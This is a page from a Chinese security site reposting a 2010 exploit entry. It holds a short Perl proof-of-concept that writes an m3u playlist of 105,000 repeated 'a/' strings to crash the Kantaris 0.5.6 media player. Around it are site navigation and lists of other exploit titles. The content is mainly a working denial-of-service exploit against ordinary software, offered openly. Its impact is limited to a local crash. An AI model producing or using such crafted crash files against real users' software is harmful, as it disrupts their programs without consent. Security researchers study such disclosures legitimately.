首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Kantaris 0.5.6 local Denial of service Poc
来源:vfocus.net 作者:Manojlovic 发布时间:2010-01-08  
#!/usr/bin/perl
#Kantaris 0.5.6 local Denial of service Poc
#
#
#Author: Teo Manojlovic
#
#How i find this bug: I was looking for mkv player because i downloaded 13 seasons
#of south park. I found Kantaris player and decided to chek it's security.
#
#
#
#
#
#Bug info:Kantaris 0.5.6 crashes while loading poc playlist.Loading  that kind of playlist
#should be possible and is possible on other media players.
#
#
#
#
#
#
#
#Here is Proof on concept.........
 
 
$file="poc.m3u";
$poc='a/' x 105000;
open(myfile,">>$file");
print myfile $poc;
close(myfile);
print "Finished\n";
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ttplayer=5.6Beta3 Dos POC
·JcomBand toolbar on IE ActiveX
·Gnome Panel <= 2.28.0 Denial o
·Total Multimedia Features DoS
·Mac OS X versions 10.5 and 10.
·Microsoft HTML Help Compiler (
·SPlayer XvidDecoder v3.3 Activ
·D-LINK DKVM-IP8 XSS Vulnerabil
·Windows Live Messenger 2009 Ac
·DirectAdmin <= 1.33.6 Symlink
·Audiotran 1.4.1 Win XP SP2/SP3
·Apple QuickTime 7.2/7.3 RTSP B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved